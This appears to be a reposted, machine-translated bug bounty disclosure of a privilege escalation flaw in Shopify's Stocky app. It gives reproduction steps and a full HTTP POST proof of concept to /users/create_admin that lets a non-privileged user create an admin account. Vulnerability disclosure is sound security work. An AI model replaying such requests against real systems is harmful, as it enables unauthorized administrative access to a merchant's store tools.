非特权用户可以在 Stocky 中创建管理员帐户

非特权用户能够在 Stocky 中创立管理员帐户

能够经过直接发布到Stocky中的/users/create_admin端点来创立新用户。关于具有 Apps 权限的工作人员，这完整绕过了 Stocky 用户登录屏幕。
请留意，我们的程序目前不承受 Stocky 中的某些类型的问题，因而请记住在深化研讨此应用程序之前查看程序页面。

重现步骤：
1.在 Stocky 中创立一个非特权用户，不要给该用户授予管理员权限。
2.运用非特权用户登录并转到https://stocky.shopifyapps.com/users/me，更新任何字段并拦截恳求。
3. 向 /users/create_admin 发出 POST 恳求，并运用您在前面步骤中截获的 Cookie 和 Token。
4. 退出 Stocky 并运用新用户登录，您将具有管理员权限。

POC

POST /users/create_admin HTTP/2

Host: stocky.shopifyapps.com

Cookie:[REPLACE COOKIES]

Content-Length: 277

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="91", " Not;A Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Upgrade-Insecure-Requests: 1

Origin: https://stocky.shopifyapps.com

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://stocky.shopifyapps.com/preferences/users

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close



utf8=%E2%9C%93&authenticity_token=[REPLACE TOKEN]&user%5Bfirst_name%5D=Sebastian&user%5Blast_name%5D=Tapia&user%5Bemail%5D=sebastiantdlt%40gmail.com&password=NewPassword123&commit=Create+%26+Login

感谢您的来访，获取更多精彩文章请收藏本站。